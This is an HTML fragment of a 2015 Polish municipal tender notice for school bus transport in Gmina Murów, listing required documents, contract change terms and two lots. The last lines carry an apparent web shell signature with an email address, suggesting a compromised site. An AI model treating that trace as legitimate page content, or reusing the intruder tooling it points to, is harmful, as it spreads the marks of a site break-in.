<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie- pełnomocnictwo do postępowania w imieniu Wykonawcy- Uwaga: dołączone wtedy o ile nie wynika z załączonych dokum entów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana istotnych postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach.
2. Zmiana może obejmować :
   1) inną okoliczność prawną, ekonomiczną lub techniczną skutkującą niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ.
     2) W przypadku zmiany hurtowej oleju napędowego EKODISEL , ogłaszanego 
         przez  Polski Koncern Naftowy Orlen S.A. o ponad 10% w stosunku do ceny 
         obowiązującej   w dniu podpisania umowy w sytuacji kiedy cena paliwa  
         osiągnie ww poziom przez   okres minimum 1 miesiąca, strony dopuszczają 
         możliwość zmiany kwoty określonej w    § 6ust. 1 nie więcej niż wskaźnik 
         wzrostu cen wynikający z ogłaszanego corocznie   Komunikatu Prezesa GUS w 
          sprawie średniorocznego wskaźnika cen towarów i usług konsumpcyjnych, nie 
           częściej niż raz w danym roku szkolnym.
     3)   zmiany podwykonawców , których udział w realizacji przedmiotu umowy
           zaakceptował Zamawiający,
3. Zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:
      1) stawki podatku od towarów i usług,
      2) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 
         2 ust.  3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu 
          za pracę ,
     3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu 
         lub  wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne- jeżeli 
         zmiany te będą miały wpływ na koszty wykonania zamówienia przez
         Wykonawcę.
4. Zmiana określona w ust. 3 pkt.2) i3) umowy będzie możliwa pod warunkiem     
    przedstawienia Zamawiającemu- przed przystąpieniem do realizacji niniejszej 
    umowy oraz przy każdej zmianie liczby lub osób pracowników- imiennej listy 
     pracowników   oddelegowanych do realizacji przedmiotowej umowy wraz z :
        1) oświadczeniem o zatrudnieniu wskazanych pracowników na umowę o pracę ,
        2) wskazaniem wysokości wynagrodzenia poszczególnych osób wraz z 
            możliwością   żądania przez Zamawiającego kopii umów o pracę,
        3)  wyliczeniem różnicy pomiędzy dotychczasowym wynagrodzeniem a zmianą
            wynagrodzenia w związku z okolicznościami wymienionymi w ust. 3 pkt. 2) i   
            3).
       4) oświadczeniem w jakim stopniu powyższe zmiany wpływają na koszty 
           wykonania umowy gdy zmiany, o których mowa w ust. 3 pkt. 2) i 3) 
           spowodują wzrost kosztów wykonania Umowy o więcej niż 10% w okresie 
           realizacji umowy. Zmiana wynagrodzenia dotyczy tej części, która pozostała 
           do wykonania.
5. Warunkiem dokonania zmian, o których mowa w ust. 2 i 3 jest złożenie pisemnego 
      wniosku  przez stronę inicjującą zmianę, zawierającego:
      1)   opis propozycji zmiany,
      2)   uzasadnienie zmiany
      3)  obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli 
            zmiana będzie miała wpływ na wynagrodzenie wykonawcy,
      4)  opis wpływu zmiany na terminy wykonania usługi
6.  Dokonanie zmian, wymaga podpisania aneksu do umowy.
8.  Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień 
      publicznych:
     1) zmiana danych związanych z obsługą administracyjno- organizacyjną umowy
     2) zmiana danych teleadresowych osób reprezentujących strony lub oznaczenia 
         stron umowy- wynikających ze zmiany stanu faktycznego albo prawnego.
9. Istnieje możliwość dokonania zmiany pracowników jedynie za uprzednią pisemną  
    zgodą Zamawiającego. Wykonawca z własnej inicjatywy proponuje zmianę 
     pracowników w następujących przypadkach:
      1) śmierci, choroby lub innych zdarzeń losowych,
      2) jeżeli zmiana tych osób stanie się konieczna z jakichkolwiek przyczyn, 
          niezależnych od Wykonawcy. W przypadku zmiany pracownika, nowa osoba powołana do  pełnienia ww obowiązków musi spełnić wymagania określone z specyfikacji istotnych  warunków zamówienia dla danej funkcji. Zamawiający może także zażądać od Wykonawcy zmiany osoby, o której mowa, jeżeli uzna , że nie wykonuje należycie swoich obowiązków. Wykonawca obowiązany jest dokonać zmiany takiej osoby w  terminie nie dłuższym niż 14 dni od daty złożenia wniosku Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.murow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można odebrać także w Urzędzie Gminy Murów, 46-030 Murów ul. Dworcowa 2 - pokój nr 19..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2015 godzina 09:00, miejsce: Ofertę należy składać w Urzędzie Gminy Murów ul. Dworcowa 2 46-030 Murów pokój nr 10 w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz uczniów wraz z opiekunami do szkół i przedszkoli na terenie Gminy Murów w formie zakupu biletów miesięcznych w ramach przewozów regularnych na lata szkolne 2015/2016,2016/2017.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)  Sprzedaż biletów miesięcznych dla uczniów dojeżdżających do szkół 
        podstawowych, gimnazjum i dzieci do przedszkoli na terenie Gminy Murów i z 
        powrotem we wszystkie dni nauki szkolnej zgodnie z zestawieniem dojazdów 
        uczniów do szkół i  przedszkoli  stanowiącym załącznik nr 1 do SIWZ. 
        Zamówienie będzie realizowane  w ramach przewozów regularnych w Krajowym 
        transporcie drogowym na podstawie 
         ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2013r 
         poz.1414).
   2)   Dopuszcza się, o ile będą miejsca w autobusach/busach , przewozy innych 
         osób,   które  będą ponosić koszty przejazdu na rzecz przewoźnika, z 
         zastrzeżeniem zapisów  ustawy z 20 czerwca 1992r. o uprawnieniach do 
          ulgowych przejazdów środkami  publicznego   transportu zbiorowego (Dz.U. z 
          2012r.poz..1138 z późn. zm.).
  3)   Uczeń nie może być wcześniej w placówce oświatowej niż pół godziny przed 
        godziną  rozpoczęcia zajęć lekcyjnych w szkole. Faktyczne  godziny odjazdów 
        autobusów  Wykonawca  ustali z dyrektorami poszczególnych szkół   przedszkoli.
    4)  Wykonawca jest zobowiązany zapewnić punktualny i bezpieczny dowóz 
         uczniów do  szkół i dzieci do przedszkoli.
    5)  Ilość i wielkość pojazdów na danym odcinku dostosować należy do ilości 
          przewożonych uczniów i dzieci do przedszkoli.
    6)   Łączna liczba uczniów do przewiezienia do szkół i przedszkoli i z powrotem  
          wynosi 236 w tym: 213 uczniów i dzieci przedszkolnych dowożonych w w 
          formie   za  biletami miesięcznymi. Dzienna trasa dowozu wynosi około 360 km.
    7)   Długość tras może ulec zmianie po przeprowadzeniu wizji lokalnej przed 
          sporządzeniem oferty.
    8)   Wykonawca zapewni bezpłatny przejazd opiekunom wyznaczonym na danej    
         trasie, opiekę w trasie  dowożenia zapewnia Zamawiający.
    9)  W przypadku awarii wyznaczonego autobusu Wykonawca podstawi 
        niezwłocznie , nie  później jednak niż w ciągu 60 minut od powstania awarii, 
        autobus spełniający właściwe  wymagania techniczne w ruchu drogowym. W 
        przypadku niemożności  zrealizowania przewozu Wykonawca pokryje  
         dodatkowo koszty przewozu wynikłe z  wykonania  usługi przez podmiot 
         zastępczy wybrany przez Zamawiającego.
 10)  Wykonawca uwzględni możliwość sporadycznych zmian godzin dowozu uczniów i 
          odbiór wynikających z organizacji pracy szkoły czy przedszkola.
 11)   Z uwagi na utrudniony manewr nawracania na drodze w miejscowości Święciny 
        i w miejscowości Okoły Zamawiający przewiduje na tych trasach dowóz 
        uczniów busami.
 12)   W przypadku odmiennej organizacji pracy szkoły i skrócenia zajęć lekcyjnych np. w dniu rekolekcji, dni 
         sprawdzianów i egzaminów zewnętrznych, sprzątanie
        świata,  w  przeddzień ferii świątecznych itp. Wykonawca zapewni odwóz 
        uczniów we wcześniejszych godzinach. Wcześniejsza organizacja odwozów nie 
        stanowi  dodatkowych zadań, należy je wkalkulować w cenę biletów.
 13)   Ostateczna ilość kursów powrotnych wynikająca z organizacji pracy szkoły z 
        uwzględnieniem przystanków oraz ewentualnych innych punktów odbioru dzieci 
         na  trasach uzgodnionych z Wykonawcą,  zostaną określone po sporządzeniu planu zajęć w
         jednostkach oświatowych pomiędzy Dyrektorami Szkół i Przedszkoli a Wykonawcą.
         Wykaz przystanków stanowi załącznik nr 2 do SIWZ.
14)   Bilety miesięczne będą przekazywane poszczególnym dyrektorom szkół i przedszkoli 
         przez Wykonawcę najpóźniej do dnia 20 miesiąca poprzedzającego miesiąc wykonania zamówienia. 
         Wykonawca na podstawie załącznika nr 3 do SIWZ będzie wystawiał 
         fakturę i  przekaże ją Zamawiającemu..
15)    Rozkład jazdy autobusów musi przewidywać przystanki w miejscowościach
        określonych    w zestawieniu. Na przystankach, o których mowa w zdaniu poprzednim, Wykonawca jest 
        zobowiązany umieścić dodatkową informację ( obok zwykłego rozkładu    jazdy) o   godzinach odjazdu i 
         przyjazdów w ramach niniejszej umowy.
16)    Uczniowie z miejscowości: Młodnik, Radomierowice, Święciny, Grabice winne być 
        dowiezione do Publicznego Gimanzjum w Zagwiździu ( zatoczka przy gimnazjum)
Miejsce wykonywania zamówienia
   
  1. Publiczna Szkoła Podstawowa w Murowie ul. Wolności 20
  2. Publiczna Szkoła Podstawowa w Starych Budkowicach ul. Wołczyńska 14
  3. Publiczne Gimnazjum w Zagwiździu ul. Lipowa 68
  4. Publiczne Przedszkole w Murowie ul. Lipowa 17
  5. Publiczne Przedszkole w Starych Budkowicach ul. Wołczyńska 2
  6. Publiczne Przedszkole w Zagwiździu ul. Lipowa 12A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.11.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas podstawienia zamiennego sprawnego pojazdu- czas reakcji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz uczniów wraz z opiekunami  z Publicznego Gimnazjum w Zagwiździu do sali gimnastycznej w  Zagwiździu ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Przewóz uczniów na zajęcia wychowania fizycznego z Publicznego Gimnazjum w 
   Zagwiździu do sali gimnastycznej w Zagwiżdziu, zgodnie z harmonogramem 
   przejazdów opracowanym przez Dyrektora Publicznego Gimnazjum w Zagwiździu  po 
   sporządzeniu planu zajęć w Publicznym Gimnazjum w terminie do 26 sierpnia 
   każdego roku wykonywanej usługi.

  2)   Ilość kursów: 
        poniedziałek  - dowóz  do sali i powrót- 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
        wtorek- dowóz do sali  i powrót - 3 kursy
        orientacyjna ilość kilometrów do przejechania  5,40km
        środa - dowóz do sali i powrót - 2 kursy
        orientacyjna ilość kilometrów do przejechania 3,60 km
        czwartek - dowóz do Sali i powrót - 1 kurs
        orientacyjna ilość kilometrów do przejechania 1,80 km
        piątek - dowóz do sali i powrót - 2 kursy 
        orientacyjna ilość kilometrów do przejechania 3,60 km
Należy rozumieć 1 kurs jako dowóz z Gimnazjum  do sali i powrót.
W ciągu tygodnia średnio 2 kursy dziennie.
3) Orientacyjna liczba uczniów przewożona jednym kursem od 18  do 22.
   Podane liczby uczniów oraz ilość kursów w danym dniu tygodnia są liczbami 
   aktualnymi na dzień ogłoszenia o zamówieniu publicznym. 
   Szczegółowy harmonogram przewozu uczniów zostanie opracowany przez 
   Dyrektora  Publicznego Gimnazjum w Zagwiździu i przekazany Wykonawcy do dnia 
   26 sierpnia danego roku szkolnego objętego zamówieniem. Harmonogram stanowić 
   będzie   załącznik do umowy
4)  Wykonawca musi dysponować minimum jednym autobusem z kierowcą - z ilością 
        miejsc siedzących zapewniającą obsługę wymaganej ilości uczniów.
5)    Wykonawca zapewni bezpłatny przejazd opiekunowi, opiekę w trakcie dowożenia 
       zapewnia Zamawiający.
6)  W przypadku awarii wyznaczonego autobusu Wykonawca podstawi niezwłocznie 
     autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W 
      przypadku niemożności zrealizowania przewozu Wykonawca pokryje dodatkowo 
      koszty  przewozu   wynikłe z wykonania  usługi  przez podmiot zastępczy 
      wybrany przez Zamawiającego.
7)   Pojazd służący do przewozu uczniów musi być oznakowany zgodnie z przepisami 
       prawa o ruchu drogowym i transporcie osób.
 8)  Zamawiający nie dopuszcza wykonania usługi w ramach regularnej komunikacji    
       autobusowej za sprzedażą biletów miesięcznych.

Miejsce wykonywania zamówienia:
 Publiczne Gimnazjum Zagwiździe ul. Lipowa 68
 Sala gimnastyczna Zagwiździe ul. Lipowa 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.30.00-3, 60.11.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com